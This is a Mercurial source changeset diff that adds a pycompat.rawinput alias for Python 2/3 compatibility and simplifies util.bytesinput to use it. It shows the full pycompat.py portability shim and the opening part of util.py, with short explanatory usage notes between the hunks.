py3: select input or raw_input by pycompat...
Yuya Nishihara
r33853:cfcfbe6c default
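This changeset moves the Python 2/3 choice between input() and raw_input() into pycompat, so callers such as util.bytesinput() no longer branch on ispy3 inline. A minimal sketch of the selection logic, using the names from the diff below:

    # chosen once at import time in mercurial/pycompat.py
    if ispy3:
        rawinput = input        # Python 3: input() returns str
    else:
        rawinput = raw_input    # Python 2: raw_input() returns bytes (str)

Callers then write pycompat.rawinput(...) and convert the result themselves.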
@@ -1,461 +1,463
1 1 # pycompat.py - portability shim for python 3
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 6 """Mercurial portability shim for python 3.
7 7
8 8 This contains aliases to hide python version-specific details from the core.
9 9 """
10 10
11 11 from __future__ import absolute_import
12 12
13 13 import getopt
14 14 import os
15 15 import shlex
16 16 import sys
17 17
18 18 ispy3 = (sys.version_info[0] >= 3)
19 19 ispypy = (r'__pypy__' in sys.builtin_module_names)
20 20
21 21 if not ispy3:
22 22 import cookielib
23 23 import cPickle as pickle
24 24 import httplib
25 25 import Queue as _queue
26 26 import SocketServer as socketserver
27 27 import xmlrpclib
28 28 else:
29 29 import http.cookiejar as cookielib
30 30 import http.client as httplib
31 31 import pickle
32 32 import queue as _queue
33 33 import socketserver
34 34 import xmlrpc.client as xmlrpclib
35 35
36 36 empty = _queue.Empty
37 37 queue = _queue.Queue
38 38
39 39 def identity(a):
40 40 return a
41 41
42 42 if ispy3:
43 43 import builtins
44 44 import functools
45 45 import io
46 46 import struct
47 47
48 48 fsencode = os.fsencode
49 49 fsdecode = os.fsdecode
50 50 oslinesep = os.linesep.encode('ascii')
51 51 osname = os.name.encode('ascii')
52 52 ospathsep = os.pathsep.encode('ascii')
53 53 ossep = os.sep.encode('ascii')
54 54 osaltsep = os.altsep
55 55 if osaltsep:
56 56 osaltsep = osaltsep.encode('ascii')
57 57 # os.getcwd() on Python 3 returns a string, but it has os.getcwdb() which
58 58 # returns bytes.
59 59 getcwd = os.getcwdb
60 60 sysplatform = sys.platform.encode('ascii')
61 61 sysexecutable = sys.executable
62 62 if sysexecutable:
63 63 sysexecutable = os.fsencode(sysexecutable)
64 64 stringio = io.BytesIO
65 65 maplist = lambda *args: list(map(*args))
66 rawinput = input
66 67
67 68 # TODO: .buffer might not exist if std streams were replaced; we'll need
68 69 # a silly wrapper to make a bytes stream backed by a unicode one.
69 70 stdin = sys.stdin.buffer
70 71 stdout = sys.stdout.buffer
71 72 stderr = sys.stderr.buffer
72 73
73 74 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
74 75 # we can use os.fsencode() to get back bytes argv.
75 76 #
76 77 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
77 78 #
78 79 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
79 80 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
80 81 if getattr(sys, 'argv', None) is not None:
81 82 sysargv = list(map(os.fsencode, sys.argv))
82 83
83 84 bytechr = struct.Struct('>B').pack
84 85
85 86 class bytestr(bytes):
86 87 """A bytes which mostly acts as a Python 2 str
87 88
88 89 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
89 90 (b'', b'foo', b'ascii', b'1')
90 91 >>> s = bytestr(b'foo')
91 92 >>> assert s is bytestr(s)
92 93
93 94 __bytes__() should be called if provided:
94 95
95 96 >>> class bytesable(object):
96 97 ... def __bytes__(self):
97 98 ... return b'bytes'
98 99 >>> bytestr(bytesable())
99 100 b'bytes'
100 101
101 102 There's no implicit conversion from non-ascii str as its encoding is
102 103 unknown:
103 104
104 105 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
105 106 Traceback (most recent call last):
106 107 ...
107 108 UnicodeEncodeError: ...
108 109
109 110 Comparison between bytestr and bytes should work:
110 111
111 112 >>> assert bytestr(b'foo') == b'foo'
112 113 >>> assert b'foo' == bytestr(b'foo')
113 114 >>> assert b'f' in bytestr(b'foo')
114 115 >>> assert bytestr(b'f') in b'foo'
115 116
116 117 Sliced elements should be bytes, not integer:
117 118
118 119 >>> s[1], s[:2]
119 120 (b'o', b'fo')
120 121 >>> list(s), list(reversed(s))
121 122 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
122 123
123 124 As bytestr type isn't propagated across operations, you need to cast
124 125 bytes to bytestr explicitly:
125 126
126 127 >>> s = bytestr(b'foo').upper()
127 128 >>> t = bytestr(s)
128 129 >>> s[0], t[0]
129 130 (70, b'F')
130 131
131 132 Be careful not to pass a bytestr object to a function which expects
132 133 bytearray-like behavior.
133 134
134 135 >>> t = bytes(t) # cast to bytes
135 136 >>> assert type(t) is bytes
136 137 """
137 138
138 139 def __new__(cls, s=b''):
139 140 if isinstance(s, bytestr):
140 141 return s
141 142 if (not isinstance(s, (bytes, bytearray))
142 143 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
143 144 s = str(s).encode(u'ascii')
144 145 return bytes.__new__(cls, s)
145 146
146 147 def __getitem__(self, key):
147 148 s = bytes.__getitem__(self, key)
148 149 if not isinstance(s, bytes):
149 150 s = bytechr(s)
150 151 return s
151 152
152 153 def __iter__(self):
153 154 return iterbytestr(bytes.__iter__(self))
154 155
155 156 def iterbytestr(s):
156 157 """Iterate bytes as if it were a str object of Python 2"""
157 158 return map(bytechr, s)
158 159
159 160 def sysbytes(s):
160 161 """Convert an internal str (e.g. keyword, __doc__) back to bytes
161 162
162 163 This never raises UnicodeEncodeError, but only ASCII characters
163 164 can be round-tripped by sysstr(sysbytes(s)).
164 165 """
165 166 return s.encode(u'utf-8')
166 167
167 168 def sysstr(s):
168 169 """Return a keyword str to be passed to Python functions such as
169 170 getattr() and str.encode()
170 171
171 172 This never raises UnicodeDecodeError. Non-ascii characters are
172 173 considered invalid and mapped to arbitrary but unique code points
173 174 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
174 175 """
175 176 if isinstance(s, builtins.str):
176 177 return s
177 178 return s.decode(u'latin-1')
178 179
179 180 def strurl(url):
180 181 """Converts a bytes url back to str"""
181 182 return url.decode(u'ascii')
182 183
183 184 def bytesurl(url):
184 185 """Converts a str url to bytes by encoding in ascii"""
185 186 return url.encode(u'ascii')
186 187
187 188 def raisewithtb(exc, tb):
188 189 """Raise exception with the given traceback"""
189 190 raise exc.with_traceback(tb)
190 191
191 192 def getdoc(obj):
192 193 """Get docstring as bytes; may be None so gettext() won't confuse it
193 194 with _('')"""
194 195 doc = getattr(obj, u'__doc__', None)
195 196 if doc is None:
196 197 return doc
197 198 return sysbytes(doc)
198 199
199 200 def _wrapattrfunc(f):
200 201 @functools.wraps(f)
201 202 def w(object, name, *args):
202 203 return f(object, sysstr(name), *args)
203 204 return w
204 205
205 206 # these wrappers are automagically imported by hgloader
206 207 delattr = _wrapattrfunc(builtins.delattr)
207 208 getattr = _wrapattrfunc(builtins.getattr)
208 209 hasattr = _wrapattrfunc(builtins.hasattr)
209 210 setattr = _wrapattrfunc(builtins.setattr)
210 211 xrange = builtins.range
211 212 unicode = str
212 213
213 214 def open(name, mode='r', buffering=-1):
214 215 return builtins.open(name, sysstr(mode), buffering)
215 216
216 217 def getoptb(args, shortlist, namelist):
217 218 """
218 219 Takes bytes arguments, converts them to unicode, passes them to
219 220 getopt.getopt(), converts the returned values back to bytes and then
220 221 returns them, for Python 3 compatibility, as getopt.getopt() doesn't
221 222 accept bytes on Python 3.
222 223 """
223 224 args = [a.decode('latin-1') for a in args]
224 225 shortlist = shortlist.decode('latin-1')
225 226 namelist = [a.decode('latin-1') for a in namelist]
226 227 opts, args = getopt.getopt(args, shortlist, namelist)
227 228 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
228 229 for a in opts]
229 230 args = [a.encode('latin-1') for a in args]
230 231 return opts, args
231 232
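For illustration, a sketch of the resulting behavior (argument values are hypothetical):

    # bytes in, bytes out; getopt itself only ever sees latin-1 str
    opts, args = getoptb([b'-v', b'file.txt'], b'v', [b'verbose='])
    # opts == [(b'-v', b'')], args == [b'file.txt']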
232 233 def strkwargs(dic):
233 234 """
234 235 Converts the keys of a python dictionary to str i.e. unicodes so that
235 236 they can be passed as keyword arguments, as dictionaries with bytes keys
236 237 can't be passed as keyword arguments to functions on Python 3.
237 238 """
238 239 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
239 240 return dic
240 241
241 242 def byteskwargs(dic):
242 243 """
243 244 Converts keys of python dictionaries back to bytes, as they were
244 245 converted to str to pass that dictionary as keyword arguments on Python 3.
245 246 """
246 247 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
247 248 return dic
248 249
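A self-contained sketch of the intended round-trip (simplified with dict comprehensions, since the helpers above rely on the mapping providing iteritems()):

    def _strkwargs(dic):        # bytes keys -> str keys for **-expansion
        return {k.decode('latin-1'): v for k, v in dic.items()}

    def _byteskwargs(dic):      # restore bytes keys inside the callee
        return {k.encode('latin-1'): v for k, v in dic.items()}

    def command(**opts):
        opts = _byteskwargs(opts)
        return opts[b'rev']

    command(**_strkwargs({b'rev': b'tip'}))     # -> b'tip'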
249 250 # TODO: handle shlex.shlex().
250 251 def shlexsplit(s):
251 252 """
252 253 Takes a bytes argument, converts it to str i.e. unicode, passes that into
253 254 shlex.split(), converts the returned value to bytes and returns that, for
254 255 Python 3 compatibility, as shlex.split() doesn't accept bytes on Python 3.
255 256 """
256 257 ret = shlex.split(s.decode('latin-1'))
257 258 return [a.encode('latin-1') for a in ret]
258 259
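A quick sketch of why latin-1 is the round-trip codec: it maps every byte 0-255 to a code point, so no input can fail to decode:

    shlexsplit(b"hg log -r 'tip'")  # -> [b'hg', b'log', b'-r', b'tip']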
259 260 else:
260 261 import cStringIO
261 262
262 263 bytechr = chr
263 264 bytestr = str
264 265 iterbytestr = iter
265 266 sysbytes = identity
266 267 sysstr = identity
267 268 strurl = identity
268 269 bytesurl = identity
269 270
270 271 # this can't be parsed on Python 3
271 272 exec('def raisewithtb(exc, tb):\n'
272 273 ' raise exc, None, tb\n')
273 274
274 275 def fsencode(filename):
275 276 """
276 277 Partial backport from os.py in Python 3, which only accepts bytes.
277 278 In Python 2, our paths should only ever be bytes, a unicode path
278 279 indicates a bug.
279 280 """
280 281 if isinstance(filename, str):
281 282 return filename
282 283 else:
283 284 raise TypeError(
284 285 "expect str, not %s" % type(filename).__name__)
285 286
286 287 # In Python 2, fsdecode() is very likely to receive bytes, so it's
287 288 # better not to touch the Python 2 part as it's already working fine.
288 289 fsdecode = identity
289 290
290 291 def getdoc(obj):
291 292 return getattr(obj, '__doc__', None)
292 293
293 294 def getoptb(args, shortlist, namelist):
294 295 return getopt.getopt(args, shortlist, namelist)
295 296
296 297 strkwargs = identity
297 298 byteskwargs = identity
298 299
299 300 oslinesep = os.linesep
300 301 osname = os.name
301 302 ospathsep = os.pathsep
302 303 ossep = os.sep
303 304 osaltsep = os.altsep
304 305 stdin = sys.stdin
305 306 stdout = sys.stdout
306 307 stderr = sys.stderr
307 308 if getattr(sys, 'argv', None) is not None:
308 309 sysargv = sys.argv
309 310 sysplatform = sys.platform
310 311 getcwd = os.getcwd
311 312 sysexecutable = sys.executable
312 313 shlexsplit = shlex.split
313 314 stringio = cStringIO.StringIO
314 315 maplist = map
316 rawinput = raw_input
315 317
316 318 class _pycompatstub(object):
317 319 def __init__(self):
318 320 self._aliases = {}
319 321
320 322 def _registeraliases(self, origin, items):
321 323 """Add items that will be populated at the first access"""
322 324 items = map(sysstr, items)
323 325 self._aliases.update(
324 326 (item.replace(sysstr('_'), sysstr('')).lower(), (origin, item))
325 327 for item in items)
326 328
327 329 def _registeralias(self, origin, attr, name):
328 330 """Alias ``origin``.``attr`` as ``name``"""
329 331 self._aliases[sysstr(name)] = (origin, sysstr(attr))
330 332
331 333 def __getattr__(self, name):
332 334 try:
333 335 origin, item = self._aliases[name]
334 336 except KeyError:
335 337 raise AttributeError(name)
336 338 self.__dict__[name] = obj = getattr(origin, item)
337 339 return obj
338 340
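For illustration, a small sketch of the lazy resolution above (os and its real getcwd attribute serve as the example target):

    stub = _pycompatstub()
    stub._registeraliases(os, ('getcwd',))
    # first access resolves via getattr(os, 'getcwd') and caches the
    # result in stub.__dict__, so __getattr__ runs only once per name
    stub.getcwd

Note that the alias key strips underscores and lowercases, so a name like 'build_opener' is exposed as buildopener.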
339 341 httpserver = _pycompatstub()
340 342 urlreq = _pycompatstub()
341 343 urlerr = _pycompatstub()
342 344 if not ispy3:
343 345 import BaseHTTPServer
344 346 import CGIHTTPServer
345 347 import SimpleHTTPServer
346 348 import urllib2
347 349 import urllib
348 350 import urlparse
349 351 urlreq._registeraliases(urllib, (
350 352 "addclosehook",
351 353 "addinfourl",
352 354 "ftpwrapper",
353 355 "pathname2url",
354 356 "quote",
355 357 "splitattr",
356 358 "splitpasswd",
357 359 "splitport",
358 360 "splituser",
359 361 "unquote",
360 362 "url2pathname",
361 363 "urlencode",
362 364 ))
363 365 urlreq._registeraliases(urllib2, (
364 366 "AbstractHTTPHandler",
365 367 "BaseHandler",
366 368 "build_opener",
367 369 "FileHandler",
368 370 "FTPHandler",
369 371 "HTTPBasicAuthHandler",
370 372 "HTTPDigestAuthHandler",
371 373 "HTTPHandler",
372 374 "HTTPPasswordMgrWithDefaultRealm",
373 375 "HTTPSHandler",
374 376 "install_opener",
375 377 "ProxyHandler",
376 378 "Request",
377 379 "urlopen",
378 380 ))
379 381 urlreq._registeraliases(urlparse, (
380 382 "urlparse",
381 383 "urlunparse",
382 384 ))
383 385 urlerr._registeraliases(urllib2, (
384 386 "HTTPError",
385 387 "URLError",
386 388 ))
387 389 httpserver._registeraliases(BaseHTTPServer, (
388 390 "HTTPServer",
389 391 "BaseHTTPRequestHandler",
390 392 ))
391 393 httpserver._registeraliases(SimpleHTTPServer, (
392 394 "SimpleHTTPRequestHandler",
393 395 ))
394 396 httpserver._registeraliases(CGIHTTPServer, (
395 397 "CGIHTTPRequestHandler",
396 398 ))
397 399
398 400 else:
399 401 import urllib.parse
400 402 urlreq._registeraliases(urllib.parse, (
401 403 "splitattr",
402 404 "splitpasswd",
403 405 "splitport",
404 406 "splituser",
405 407 "urlparse",
406 408 "urlunparse",
407 409 ))
408 410 urlreq._registeralias(urllib.parse, "unquote_to_bytes", "unquote")
409 411 import urllib.request
410 412 urlreq._registeraliases(urllib.request, (
411 413 "AbstractHTTPHandler",
412 414 "BaseHandler",
413 415 "build_opener",
414 416 "FileHandler",
415 417 "FTPHandler",
416 418 "ftpwrapper",
417 419 "HTTPHandler",
418 420 "HTTPSHandler",
419 421 "install_opener",
420 422 "pathname2url",
421 423 "HTTPBasicAuthHandler",
422 424 "HTTPDigestAuthHandler",
423 425 "HTTPPasswordMgrWithDefaultRealm",
424 426 "ProxyHandler",
425 427 "Request",
426 428 "url2pathname",
427 429 "urlopen",
428 430 ))
429 431 import urllib.response
430 432 urlreq._registeraliases(urllib.response, (
431 433 "addclosehook",
432 434 "addinfourl",
433 435 ))
434 436 import urllib.error
435 437 urlerr._registeraliases(urllib.error, (
436 438 "HTTPError",
437 439 "URLError",
438 440 ))
439 441 import http.server
440 442 httpserver._registeraliases(http.server, (
441 443 "HTTPServer",
442 444 "BaseHTTPRequestHandler",
443 445 "SimpleHTTPRequestHandler",
444 446 "CGIHTTPRequestHandler",
445 447 ))
446 448
447 449 # urllib.parse.quote() accepts both str and bytes, decodes bytes
448 450 # (if necessary), and returns str. This is wonky. We provide a custom
449 451 # implementation that only accepts bytes and emits bytes.
450 452 def quote(s, safe=r'/'):
451 453 s = urllib.parse.quote_from_bytes(s, safe=safe)
452 454 return s.encode('ascii', 'strict')
453 455
454 456 # urllib.parse.urlencode() returns str. We use this function to make
455 457 # sure we return bytes.
456 458 def urlencode(query, doseq=False):
457 459 s = urllib.parse.urlencode(query, doseq=doseq)
458 460 return s.encode('ascii')
459 461
460 462 urlreq.quote = quote
461 463 urlreq.urlencode = urlencode
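For illustration, a hedged sketch of the bytes-in/bytes-out contract the two wrappers above establish on Python 3 (values are hypothetical):

    urlreq.quote(b'a b/c')              # -> b'a%20b/c' ('/' stays unescaped)
    urlreq.urlencode({b'k': b'v w'})    # -> b'k=v+w'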
@@ -1,3776 +1,3773
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import os
30 30 import platform as pyplatform
31 31 import re as remod
32 32 import shutil
33 33 import signal
34 34 import socket
35 35 import stat
36 36 import string
37 37 import subprocess
38 38 import sys
39 39 import tempfile
40 40 import textwrap
41 41 import time
42 42 import traceback
43 43 import warnings
44 44 import zlib
45 45
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 policy,
51 51 pycompat,
52 52 )
53 53
54 54 base85 = policy.importmod(r'base85')
55 55 osutil = policy.importmod(r'osutil')
56 56 parsers = policy.importmod(r'parsers')
57 57
58 58 b85decode = base85.b85decode
59 59 b85encode = base85.b85encode
60 60
61 61 cookielib = pycompat.cookielib
62 62 empty = pycompat.empty
63 63 httplib = pycompat.httplib
64 64 httpserver = pycompat.httpserver
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 socketserver = pycompat.socketserver
68 68 stderr = pycompat.stderr
69 69 stdin = pycompat.stdin
70 70 stdout = pycompat.stdout
71 71 stringio = pycompat.stringio
72 72 urlerr = pycompat.urlerr
73 73 urlreq = pycompat.urlreq
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 # workaround for win32mbcs
77 77 _filenamebytestr = pycompat.bytestr
78 78
79 79 def isatty(fp):
80 80 try:
81 81 return fp.isatty()
82 82 except AttributeError:
83 83 return False
84 84
85 85 # glibc determines buffering on first write to stdout - if we replace a
86 86 # TTY-destined stdout with a pipe-destined stdout (e.g. pager), we want
87 87 # line buffering
88 88 if isatty(stdout):
89 89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 90
91 91 if pycompat.osname == 'nt':
92 92 from . import windows as platform
93 93 stdout = platform.winstdout(stdout)
94 94 else:
95 95 from . import posix as platform
96 96
97 97 _ = i18n._
98 98
99 99 bindunixsocket = platform.bindunixsocket
100 100 cachestat = platform.cachestat
101 101 checkexec = platform.checkexec
102 102 checklink = platform.checklink
103 103 copymode = platform.copymode
104 104 executablepath = platform.executablepath
105 105 expandglobs = platform.expandglobs
106 106 explainexit = platform.explainexit
107 107 findexe = platform.findexe
108 108 gethgcmd = platform.gethgcmd
109 109 getuser = platform.getuser
110 110 getpid = os.getpid
111 111 groupmembers = platform.groupmembers
112 112 groupname = platform.groupname
113 113 hidewindow = platform.hidewindow
114 114 isexec = platform.isexec
115 115 isowner = platform.isowner
116 116 listdir = osutil.listdir
117 117 localpath = platform.localpath
118 118 lookupreg = platform.lookupreg
119 119 makedir = platform.makedir
120 120 nlinks = platform.nlinks
121 121 normpath = platform.normpath
122 122 normcase = platform.normcase
123 123 normcasespec = platform.normcasespec
124 124 normcasefallback = platform.normcasefallback
125 125 openhardlinks = platform.openhardlinks
126 126 oslink = platform.oslink
127 127 parsepatchoutput = platform.parsepatchoutput
128 128 pconvert = platform.pconvert
129 129 poll = platform.poll
130 130 popen = platform.popen
131 131 posixfile = platform.posixfile
132 132 quotecommand = platform.quotecommand
133 133 readpipe = platform.readpipe
134 134 rename = platform.rename
135 135 removedirs = platform.removedirs
136 136 samedevice = platform.samedevice
137 137 samefile = platform.samefile
138 138 samestat = platform.samestat
139 139 setbinary = platform.setbinary
140 140 setflags = platform.setflags
141 141 setsignalhandler = platform.setsignalhandler
142 142 shellquote = platform.shellquote
143 143 spawndetached = platform.spawndetached
144 144 split = platform.split
145 145 sshargs = platform.sshargs
146 146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 147 statisexec = platform.statisexec
148 148 statislink = platform.statislink
149 149 testpid = platform.testpid
150 150 umask = platform.umask
151 151 unlink = platform.unlink
152 152 username = platform.username
153 153
154 154 try:
155 155 recvfds = osutil.recvfds
156 156 except AttributeError:
157 157 pass
158 158 try:
159 159 setprocname = osutil.setprocname
160 160 except AttributeError:
161 161 pass
162 162
163 163 # Python compatibility
164 164
165 165 _notset = object()
166 166
167 167 # disable Python's problematic floating point timestamps (issue4836)
168 168 # (Python hypocritically says you shouldn't change this behavior in
169 169 # libraries, and sure enough Mercurial is not a library.)
170 170 os.stat_float_times(False)
171 171
172 172 def safehasattr(thing, attr):
173 173 return getattr(thing, attr, _notset) is not _notset
174 174
175 175 def bytesinput(fin, fout, *args, **kwargs):
176 176 sin, sout = sys.stdin, sys.stdout
177 177 try:
178 178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 if pycompat.ispy3:
180 return encoding.strtolocal(input(*args, **kwargs))
181 else:
182 return raw_input(*args, **kwargs)
179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
183 180 finally:
184 181 sys.stdin, sys.stdout = sin, sout
185 182
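A usage sketch (ui.fin, ui.fout and the prompt value are assumptions drawn from Mercurial's ui layer, not part of this diff):

    # prompt on the ui's streams; the reply comes back as local bytes
    reply = bytesinput(ui.fin, ui.fout, 'continue (y/n)? ')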
186 183 def bitsfrom(container):
187 184 bits = 0
188 185 for bit in container:
189 186 bits |= bit
190 187 return bits
191 188
192 189 # python 2.6 still has deprecation warnings enabled by default. We do not want
193 190 # to display anything to the standard user, so detect if we are running tests
194 191 # and only use python deprecation warnings in that case.
195 192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
196 193 if _dowarn:
197 194 # explicitly unfilter our warning for python 2.7
198 195 #
199 196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
200 197 # However, module name set through PYTHONWARNINGS was exactly matched, so
201 198 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
202 199 # makes the whole PYTHONWARNINGS thing useless for our use case.
203 200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
204 201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
205 202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
206 203
207 204 def nouideprecwarn(msg, version, stacklevel=1):
208 205 """Issue an python native deprecation warning
209 206
210 207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 208 """
212 209 if _dowarn:
213 210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
214 211 " update your code.)") % version
215 212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
216 213
217 214 DIGESTS = {
218 215 'md5': hashlib.md5,
219 216 'sha1': hashlib.sha1,
220 217 'sha512': hashlib.sha512,
221 218 }
222 219 # List of digest types from strongest to weakest
223 220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
224 221
225 222 for k in DIGESTS_BY_STRENGTH:
226 223 assert k in DIGESTS
227 224
228 225 class digester(object):
229 226 """helper to compute digests.
230 227
231 228 This helper can be used to compute one or more digests given their name.
232 229
233 230 >>> d = digester(['md5', 'sha1'])
234 231 >>> d.update('foo')
235 232 >>> [k for k in sorted(d)]
236 233 ['md5', 'sha1']
237 234 >>> d['md5']
238 235 'acbd18db4cc2f85cedef654fccc4a4d8'
239 236 >>> d['sha1']
240 237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
241 238 >>> digester.preferred(['md5', 'sha1'])
242 239 'sha1'
243 240 """
244 241
245 242 def __init__(self, digests, s=''):
246 243 self._hashes = {}
247 244 for k in digests:
248 245 if k not in DIGESTS:
249 246 raise Abort(_('unknown digest type: %s') % k)
250 247 self._hashes[k] = DIGESTS[k]()
251 248 if s:
252 249 self.update(s)
253 250
254 251 def update(self, data):
255 252 for h in self._hashes.values():
256 253 h.update(data)
257 254
258 255 def __getitem__(self, key):
259 256 if key not in DIGESTS:
260 257 raise Abort(_('unknown digest type: %s') % k)
261 258 return self._hashes[key].hexdigest()
262 259
263 260 def __iter__(self):
264 261 return iter(self._hashes)
265 262
266 263 @staticmethod
267 264 def preferred(supported):
268 265 """returns the strongest digest type in both supported and DIGESTS."""
269 266
270 267 for k in DIGESTS_BY_STRENGTH:
271 268 if k in supported:
272 269 return k
273 270 return None
274 271
275 272 class digestchecker(object):
276 273 """file handle wrapper that additionally checks content against a given
277 274 size and digests.
278 275
279 276 d = digestchecker(fh, size, {'md5': '...'})
280 277
281 278 When multiple digests are given, all of them are validated.
282 279 """
283 280
284 281 def __init__(self, fh, size, digests):
285 282 self._fh = fh
286 283 self._size = size
287 284 self._got = 0
288 285 self._digests = dict(digests)
289 286 self._digester = digester(self._digests.keys())
290 287
291 288 def read(self, length=-1):
292 289 content = self._fh.read(length)
293 290 self._digester.update(content)
294 291 self._got += len(content)
295 292 return content
296 293
297 294 def validate(self):
298 295 if self._size != self._got:
299 296 raise Abort(_('size mismatch: expected %d, got %d') %
300 297 (self._size, self._got))
301 298 for k, v in self._digests.items():
302 299 if v != self._digester[k]:
303 300 # i18n: first parameter is a digest name
304 301 raise Abort(_('%s mismatch: expected %s, got %s') %
305 302 (k, v, self._digester[k]))
306 303
307 304 try:
308 305 buffer = buffer
309 306 except NameError:
310 307 def buffer(sliceable, offset=0, length=None):
311 308 if length is not None:
312 309 return memoryview(sliceable)[offset:offset + length]
313 310 return memoryview(sliceable)[offset:]
314 311
315 312 closefds = pycompat.osname == 'posix'
316 313
317 314 _chunksize = 4096
318 315
319 316 class bufferedinputpipe(object):
320 317 """a manually buffered input pipe
321 318
322 319 Python will not let us use buffered IO and lazy reading with 'polling' at
323 320 the same time. We cannot probe the buffer state and select will not detect
324 321 that data are ready to read if they are already buffered.
325 322
326 323 This class lets us work around that by implementing its own buffering
327 324 (allowing efficient readline) while offering a way to know if the buffer is
328 325 empty from the output (allowing collaboration of the buffer with polling).
329 326
330 327 This class lives in the 'util' module because it makes use of the 'os'
331 328 module from the python stdlib.
332 329 """
333 330
334 331 def __init__(self, input):
335 332 self._input = input
336 333 self._buffer = []
337 334 self._eof = False
338 335 self._lenbuf = 0
339 336
340 337 @property
341 338 def hasbuffer(self):
342 339 """True is any data is currently buffered
343 340
344 341 This will be used externally a pre-step for polling IO. If there is
345 342 already data then no polling should be set in place."""
346 343 return bool(self._buffer)
347 344
348 345 @property
349 346 def closed(self):
350 347 return self._input.closed
351 348
352 349 def fileno(self):
353 350 return self._input.fileno()
354 351
355 352 def close(self):
356 353 return self._input.close()
357 354
358 355 def read(self, size):
359 356 while (not self._eof) and (self._lenbuf < size):
360 357 self._fillbuffer()
361 358 return self._frombuffer(size)
362 359
363 360 def readline(self, *args, **kwargs):
364 361 if 1 < len(self._buffer):
365 362 # this should not happen because both read and readline end with a
366 363 # _frombuffer call that collapses it.
367 364 self._buffer = [''.join(self._buffer)]
368 365 self._lenbuf = len(self._buffer[0])
369 366 lfi = -1
370 367 if self._buffer:
371 368 lfi = self._buffer[-1].find('\n')
372 369 while (not self._eof) and lfi < 0:
373 370 self._fillbuffer()
374 371 if self._buffer:
375 372 lfi = self._buffer[-1].find('\n')
376 373 size = lfi + 1
377 374 if lfi < 0: # end of file
378 375 size = self._lenbuf
379 376 elif 1 < len(self._buffer):
380 377 # we need to take previous chunks into account
381 378 size += self._lenbuf - len(self._buffer[-1])
382 379 return self._frombuffer(size)
383 380
384 381 def _frombuffer(self, size):
385 382 """return at most 'size' data from the buffer
386 383
387 384 The data are removed from the buffer."""
388 385 if size == 0 or not self._buffer:
389 386 return ''
390 387 buf = self._buffer[0]
391 388 if 1 < len(self._buffer):
392 389 buf = ''.join(self._buffer)
393 390
394 391 data = buf[:size]
395 392 buf = buf[len(data):]
396 393 if buf:
397 394 self._buffer = [buf]
398 395 self._lenbuf = len(buf)
399 396 else:
400 397 self._buffer = []
401 398 self._lenbuf = 0
402 399 return data
403 400
404 401 def _fillbuffer(self):
405 402 """read data to the buffer"""
406 403 data = os.read(self._input.fileno(), _chunksize)
407 404 if not data:
408 405 self._eof = True
409 406 else:
410 407 self._lenbuf += len(data)
411 408 self._buffer.append(data)
412 409
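A sketch of the poll-friendly pattern this class enables (subprocess is already imported in this module; the child command is hypothetical):

    proc = subprocess.Popen(['cat'], stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE)
    pipe = bufferedinputpipe(proc.stdout)
    # only poll/select on pipe.fileno() when pipe.hasbuffer is False;
    # data sitting in the internal buffer would never wake the poll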
413 410 def popen2(cmd, env=None, newlines=False):
414 411 # Setting bufsize to -1 lets the system decide the buffer size.
415 412 # The default for bufsize is 0, meaning unbuffered. This leads to
416 413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
417 414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
418 415 close_fds=closefds,
419 416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
420 417 universal_newlines=newlines,
421 418 env=env)
422 419 return p.stdin, p.stdout
423 420
424 421 def popen3(cmd, env=None, newlines=False):
425 422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
426 423 return stdin, stdout, stderr
427 424
428 425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
429 426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
430 427 close_fds=closefds,
